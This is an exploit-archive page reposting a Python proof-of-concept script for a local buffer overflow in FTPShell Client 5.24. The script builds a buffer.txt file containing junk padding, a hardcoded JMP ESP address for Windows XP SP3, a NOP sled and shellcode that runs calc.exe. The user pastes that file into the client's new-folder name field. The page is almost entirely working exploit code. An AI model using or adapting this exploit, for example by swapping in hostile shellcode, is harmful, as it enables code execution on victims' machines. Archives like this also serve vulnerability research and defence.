FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow Exploit

来源：vfocus.net 作者：Khazaei 发布时间：2016-02-14

#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow

#[+] Date: 2/2/2016

#[+]Exploit Author: Arash Khazaei

#[+] Vendor Homepage: www.ftpshell.com

#[+]Software Link: http://www.ftpshell.com/download.htm

#[+] Version: 5.24

#[+] Tested on: Windows XP Professional SP3 (Version 2002)

#[+] CVE : N/A

#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content

#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...

#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#!/usr/bin/python

filename = "buffer.txt"

# Junk A

junk = "A"*452

#77FAB277 JMP ESP

# Windows Xp Professional Version 2002 Service Pack 3

eip = "\x77\xB2\xFA\x77"

# Nops

nops = "\x90"*100

# Shellcode Calc.exe 16Byte

buf=("\x31\xC9"

"\x51"

"\x68\x63\x61\x6C\x63"

"\x54"

"\xB8\xC7\x93\xC2\x77"

"\xFF\xD0")

#Appending Buffers Together

exploit = junk + eip + nops + buf

#Creating File

length = len(exploit)

print "[+]File name: [%s]\n" % filename

print "[+]Payload Size: [%s]\n " % length

print "[+]File Created.\n"

file = open(filename,"w")

file.write(exploit)

file.close

print exploit

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告